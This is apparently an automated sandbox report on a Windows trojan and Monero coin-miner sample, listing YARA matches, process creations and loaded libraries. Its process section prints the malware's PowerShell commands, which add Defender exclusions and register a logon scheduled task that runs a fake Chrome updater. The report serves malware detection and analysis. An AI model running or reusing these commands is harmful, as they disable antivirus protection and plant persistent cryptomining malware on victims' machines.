Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BC30	26_2_000002824E89BC30
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8F2CDC	26_2_000002824E8F2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBE3C	26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FFEF8	26_2_000002824E8FFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E902258	26_2_000002824E902258
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBC30	26_2_000002824E8FBC30
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473D1658	27_2_0000021B473D1658
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473CB23C	27_2_0000021B473CB23C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473C20DC	27_2_0000021B473C20DC
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473CB030	27_2_0000021B473CB030
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473CF2F8	27_2_0000021B473CF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B42258	27_2_0000021B47B42258
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BE3C	27_2_0000021B47B3BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B32CDC	27_2_0000021B47B32CDC
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BC30	27_2_0000021B47B3BC30
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3FEF8	27_2_0000021B47B3FEF8

PE file contains more sections than normal

Source: updater.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: ylVAEHbMLf.exe	Static PE information: Number of sections : 11 > 10

Yara signature match

Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@24/79@0/2

Source: C:\Windows\System32\dialer.exe

4_2_00007FF78AB32328

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

4_2_00007FF78AB31AC4

Source: C:\Windows\System32\dialer.exe

4_2_00007FF78AB32328

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

File created: C:\Users\user\AppData\Roaming\Google

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2256:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

File created: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp

Jump to behavior

Source: ylVAEHbMLf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ylVAEHbMLf.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

File read: C:\Users\user\Desktop\ylVAEHbMLf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ylVAEHbMLf.exe "C:\Users\user\Desktop\ylVAEHbMLf.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
